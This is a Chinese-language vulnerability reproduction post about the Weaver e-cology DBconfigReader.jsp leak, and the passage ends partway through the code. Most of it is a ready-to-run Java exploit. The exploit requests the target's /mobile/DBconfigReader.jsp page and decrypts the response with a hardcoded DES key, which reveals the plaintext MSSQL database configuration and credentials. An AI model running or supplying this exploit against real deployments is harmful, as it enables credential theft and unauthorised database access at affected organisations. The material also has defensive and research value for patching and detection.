0x00 概述 201910，网上爆出泛微数据库（MSSQL）配置泄露漏洞，攻击者可以通过漏洞页面DBconfigReader.jsp将获取的的内容解密，可得到明文数据库配置。 影响范围包括不限于8.0、9.0版。   0x01 漏洞重现 利用ecologyexp.jar   package com;   import org.apache.http.HttpEntity; import org.apache.http.client.methods.CloseableHttpResponse; import org.apache.http.client.methods.HttpGet; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.client.HttpClientBuilder; import org.apache.http.util.EntityUtils;   import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.DESKeySpec; import java.security.SecureRandom;   public class ReadDbConfig { private final static String DES = “DES”; private final static String key = “1z2x3c4v5b6n”;   public static void main(String[] args) throws Exception { if(args[0]!=null&& args[0].length() !=0){ String url = args[0]+”/mobile/DBconfigReader.jsp”; System.out.println(ReadConfig(url)); }else{ System.err.print(“use: java -jar ecologyExp  http://127.0.0.1”); } }   private static String ReadConfig(String url) throws Exception { CloseableHttpClient httpClient = HttpClientBuilder.create().build(); HttpGet httpGet = new HttpGet(url); CloseableHttpResponse response = httpClient.execute(httpGet); HttpEntity responseEntity = response.getEntity();   byte[] res1 = EntityUtils.toByteArray(responseEntity);   byte[] data = subBytes(res1,10,res1.length-10);   byte [] finaldata =decrypt(data,key.getBytes());   return (new String(finaldata)); }   private static byte[] decrypt(byte[] data, byte[] key) throws Exception {   SecureRandom sr = new SecureRandom(); DESKeySpec dks = new DESKeySpec(key); SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(DES); SecretKey securekey = keyFactory.generateSecret(dks); Cipher cipher = Cipher.getInstance(DES); cipher.init(Cipher.DECRYPT_MODE, securekey, sr);   return cipher.doFinal(data); }   public static byte[]……